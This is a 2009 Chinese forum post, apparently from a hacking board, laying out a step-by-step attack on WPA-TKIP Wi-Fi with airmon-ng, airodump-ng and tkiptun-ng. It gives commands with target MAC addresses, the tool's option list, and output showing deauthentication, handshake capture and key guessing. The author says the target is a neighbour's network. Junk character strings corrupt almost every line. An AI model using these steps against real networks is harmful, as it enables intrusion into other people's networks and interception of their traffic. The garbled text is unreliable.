中尉
- 注册时间
- 2009-1-20
- 金币
- 267 个
- 威望
- 24 个
- 荣誉
- 7 个
尚未签到
|
本帖最后由 ji8635382 于 2009-3-3 17:59 编辑
# r6 W0 |# ~2 K" ?* x# B: E
" o. f0 D' f: c* p& @ErikTews将在东京的PacSec大会上,演示他是如何在15分钟内破解WPA加密技术的。之前的无线加密技术WEP只需使用当今的笔记本即可在几分钟内破解。EricTews将演示他是如何破解WPA加密技术来读取从路由器传往笔记本的数据。为了读取正在传送的数据,Tews找到了无需用字典攻击法,来破解临时密钥完整性协议(TKIP)的方法。/ J% l5 c3 ^/ ]8 \0 i: E& V
下面就是进行破解的步骤 我参考国外的论坛写的!
% B) y p- m( Z+ r6 b) C. K1 y首先要具备3点必备的攻击条件& o! c9 h$ Z9 N( A6 S' @& d
1 客户端和接入点必须使用WPA TKIP 而且客户端必须连接 5 k1 O6 Y. n- e Z
2 客户端和接入点必须使用的网络协议地址的IPv4
0 R4 y* B9 P( R! \: C3一个长期存在的时间延长键(重新输入间隔)必须设定的接入点。在大多数调制解调器/无线路由器使用TKIP ,这一时期是默认情况下设置为3600秒,从而使攻击# k0 a( K4 z y- a0 g6 `* B2 q+ K
以上3点基本上是没有问题了下面是就是攻击了, ~9 B* c& y" y; w& O
airmon-ng a 首先把网卡监视模式打开:输入airmon-ng start wlan0 注意我的网卡端口是wlan0不同的网卡端口都不一样可以用ifconfig -a 进行查看
5 L: _' [9 K3 S. K/ g( B- Q输入后出现的内如如下
3 X9 @0 H) E+ i7 a% xPID Name
( C& j9 g+ G& f! o4 }2954 dhcpcd8 x) P. O5 k) D
' R5 S# o0 `6 a; t
9 z+ e8 S4 N J2 rInterface Chipset Driver
0 P6 P0 t+ J$ s3 `( [5 |6 L
& |, y- S; e9 R& ewlan0 RTL8187 r8187 (monitor mode enabled)) \% a9 I4 x8 ~7 d3 ~* k
不需要另外安装tkiptun-ng bt3正式版有自带的
5 P6 }6 ^* I& L" W+ b( \6 _2楼有最新的aircrack工具里面有带tkiptun-ng工具" w4 F$ @. {7 A5 `
介绍下tkiptun-ng工具% }( I6 [8 P5 M9 G: U( T
0 Q' N" ^1 U- f6 W- E, Q
Filter options:过滤器的!) @+ \9 Q+ B) w; j, J" i) Q2 \5 b- A
1 x+ S6 g A! R, l6 m -d dmac : MAC address, Destination
+ [" p) @5 Q9 `# h+ h -s smac : MAC address, Source$ R4 [ m# C, L. B* M }
-m len : minimum packet length
; S, s( ]4 z! P) O5 R/ c8 q -n len : maximum packet length
: H" T$ z* L* I: F# o2 z -t tods : frame control, To DS bit
/ }! s/ x; e: @. _$ A/ H8 r% }$ g -f fromds : frame control, From DS bit
- c4 T1 `. k8 s% H+ P `9 c* J; k -D : disable AP detection f- h$ Q6 C7 c8 X
! j5 R; d% D% B: w, F) d Replay options:攻击的!8 ]. a; i; `# G( \
! p1 W8 o0 E& Y -x nbpps : number of packets per second
6 \1 {1 t0 t; D -a bssid : set Access Point MAC address
/ t- x/ z! U6 s K$ L9 k0 G -c dmac : set Destination MAC address
/ M8 m# }& O2 ]) K+ Z6 y5 A -h smac : set Source MAC address
% `3 c! F ]5 d* M+ Y# ^ -F : choose first matching packet
; U5 k7 Z2 I. c+ P& G8 j! S -e essid : set target AP SSID' X1 @& A! w# R, ?- x
2 {1 v4 ]2 ^2 e7 N' c
Debug options:调试的!" K) Q- m6 T w; N: a
-K prga : keystream for continuation
7 ^! ?: \7 Z l8 i% o+ H- Q( | -y file : keystream-file for continuation; g3 ]5 D9 M( [' N3 D$ D
-j : inject FromDS packets
% r0 w6 ?8 }7 m- V7 w( V$ f3 \ ?* j3 R -P pmk : pmk for verification/vuln testing" E! T" \# P! a3 ^# m- P2 e+ l
-p psk : psk to calculate pmk with essid1 G- ?5 o3 l d1 o! y S6 Y# t% O
! B! J8 w6 {. Q/ u5 C- G+ q2 S" |
source options: 这个不太清楚 。:)呵呵
; b) Z* u; K9 {. Z7 @5 x
0 J6 k! m; T. t' A8 u -i iface : capture packets from this interface
$ L8 V- a# r6 \/ R -r file : extract packets from this pcap file- s( d; i. @! L; l
D: g8 O1 y0 V, T& F. x5 V/ G --help : Displays this usage screen( q L% ^, n. S$ L* e: c1 O# ^
" Q- D1 O6 J4 [9 d0 [2 u
这个使用 airodump-ng -w 1 wlan0 这个就不解释了
, f" X" R/ c& z4 ^& V+ |7 A
) x5 i7 _3 w. `" E6 s1 k) q U我看下图1有一个essid为linksys的ap底下也有正常的客服端 这个我在上面注意已经强调了必需要有。
* r1 G+ P U: M; A然后我们在打开一个 shell 下面开始tkiptun-ng的命令/ K5 i: [* |0 y
tkiptun-ng wlan0 -a 00:0C:41 3:12:81 -h 00:12:F0:6F:ED:38 wlan0 是我的端口 -a 是我们要工具的ap mac地址 使用airodump-ng工具时可以看到 -h 是我们自己的 mac地址用 ifconfig -a 可以查到 记入监视模式要忽略掉后面的0 接着我们可以看到图2的内容我们可以看到图上写着 注入成功 等待信号 拿到握手包 等等的内容
0 N( E( b3 B3 F0 K: }2 i最后就等待ARP协议数据包的收集了 c8 k9 T' Q; t4 A; X6 V" J
. L6 d+ F$ O. F3 V+ ^1 m以上就是攻击的方式了
. `5 a) k$ T2 ?& W! Y( {" F O5 Y; ~, g5 \
8 p, q) [9 T p0 V+ e3 b, A呵呵我也不知道出了问题还是我遗漏了什么或者可能是我的配置是问题,tkiptun-ng攻击一直在等待数据包气死我了 但是看老外也有成功注入的人希望你们也可以成功 tkiptun-ng还是测试版 我想正式版出来应该可以解决很多问题的! 希望大家对tkiptun-ng能多点关注 wpa的破解是有明天的 哈哈哈哈哈哈哈!!!!!!!!; w+ w) o9 S6 D5 X9 `$ ^
/ ~# [% u; Y U: y
/ P$ Y h' O! w' \9 j( X0 U
w; v, L B9 f1 [
7 n/ Q7 Z2 n' r% ]6 j
/ `5 H' n+ [0 ^3 E. ]8 N
) o4 P* a. a6 g! x; {+ p1 |
) B F5 ~$ W" g' c9 H3 W- [& t$ D4 ?
9 x" H4 b% E) {
' \( X y- C1 K* l/ }# ^& N O# p5 H& s/ u. \8 n
. V* u+ d& [. u
0 @. q3 P [, E8 R9 p% R _ Z
! t4 ^% o, H4 |, v& t( \) f7 P* f$ H8 I7 B3 o, Y: P
/ B7 a4 P4 i- }6 A* ^, C
) n' q$ u% D# r0 t! ~ r
3 [5 {4 W$ @. T- v1 n# j/ ]; L
+ b; ]- f! D( N. _7 K
6 \" _% U8 ^: [% e, b+ h* ] :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory:
; D. a- o% m B$ O) J! s8 t. Q6 Y) ~+ T# y5 j7 D
底下是新写的哦! 本教程只作参考任何法律责任我一概不负责。3 k( x4 a& D9 ~0 V
% f; Q9 t& z7 f0 g1 u1 P5 H/ }
2楼有最新的aircrack工具里面有带tkiptun-ng工具* ~0 C$ W, L) j3 c6 A9 B
& L0 g; b r/ V# x5 |+ F0 d忙了一上午回家 还是习惯把bt3打开看看回顾上次做的东西 突然有想到了tkiptun-ng因为用airolib-ng做hash表实在耗时间还有就是我邻居他设的wpa2密码实在厉害我已经给他搞的心力交瘁了,可是我有不想放弃比较我在这密码上耗的时间太多了。好了进入正题
* p8 F9 V5 N x1 E. `$ n2 t+ e3 e3 { V+ @. u C5 n
打开shell输入airodump-ng -w vicino ath1 这个不解释了看不懂我也没有办法。
+ v4 ] g) y8 z, S* {. x- P监视你要破解的wpa-TKIP密码类型的ap记住必需要有客服端的/ Y( V6 m4 ?; `4 v i% T
关于底下那朋友说的需要更改mac 其实是不需要的 你输入底下的命令后软件自动更改mac( e3 `$ P9 ~% ~9 Y8 b
1 tkiptun-ng -h 00:12:F0:6F:ED:38 -a 00:0C:41 3:12:81-m 80 -n 100 ath1 我用atheros网卡了所以显示ath1监视端口和上面的不一样,因为这次不是用我的华硕本本 今天用hp的!呵呵! -m 是最小数据包长度 -n 是最大数据包长度 我 80 和100比较稳定其他都效果不佳 这个是真对我ath网卡的其他的自己试试。 -h 写客服端的mac
+ M4 `& i3 n( y$ Q7 n!输入命令后出后会出现下面结果 图我没有办法给你们看了因为那太电脑还在破解中我是用另外的电脑写的希望你们理解!8 t$ _5 y" l8 o9 {/ C
Blub 2:38 E6 38 1C 24 15 1C CF
( b6 y! i Y kBlub 1:17 DD 0D 69 1D C3 1F EE
' l7 o6 T% l" _8 K8 TBlub 3:29 31 79 E7 E6 CF 8D 5E 如果一直停留在 等待ARP协议数据包 就重新开始因为一直等就没有用的!
$ O4 j8 ^* k; F1 }+ A- t; y- U9 B14:48:00 Michael Test: Successful(这个意思是测试成功) 看清楚上面的 blub 1 2 3这个是固定的显示一定要和我写的一样才可以成功 这个工具的握手包没法靠攻击得到大家请慢慢的等 自己用aireplay工具的是无用的我已经式过了。 ( h, U5 \4 G) ^
14:48:00 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 14 d* }3 a3 y9 I" L
14:48:00 Found specified AP
$ C9 j& X4 M& j$ h+ X5 Y14:48:00 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 2| 4 ACKs]9 l/ d0 f* \8 H( @
14:48:02 WPA handshake: 00:0C:41 3:12:81 captured
' Z+ ^( e+ M! \* }5 U! `7 _8 u14:48:02 Waiting for an ARP packet coming from the Client...( M! R* e* `( K( Q0 t% N
Saving chosen packet in replay_src-1109-144822.cap5 O+ G% g( I- y- E' H! g. D( J
14:48:22 Waiting for an ARP response packet coming from the AP...* E" d a7 i1 \" W
Saving chosen packet in replay_src-1109-144822.cap+ x# l. f) R% _# ?! C" L$ J
14:48:22 Got the answer!
, |" D( y7 p2 F- @8 ~; y14:48:22 Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.
0 c4 w4 a" K3 L p4 j, c. H& W! k9 p1 L6 f- ^* h- ~
Sent 80 packets, current guess: 37.. 看到了吗?和上面的不一样哦!呵呵 现在开始猜密码了,你们有没有注意它写什么发包猜测 也就是说这软件是攻击ap在获取wpa的密码信息 这那我想到破解wep了!呵呵 现在猜了37次了 密码还没出现看来我邻居的密码真的很复杂啊!
8 B5 e1 l, w! q4 d6 ^6 e6 X
% U6 i) M3 }' R9 {4 ~0 Rhirte成员还没有公布正式的方法这些都是乱搞的!在东京大会上是15钟破解而我现在都用了1个小时还没有密码 现在只能等待正式版
0 l) r; @5 g& d+ T* [5 m& V 我现在电脑已经猜了58次 还没有出现密码 大家保佑我,如果出现密码会和大家说的 还有一个要注意客服端必需一直在线不然就无法用它攻击了。哎!!~~~~ |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
x
评分
-
1
查看全部评分
-
|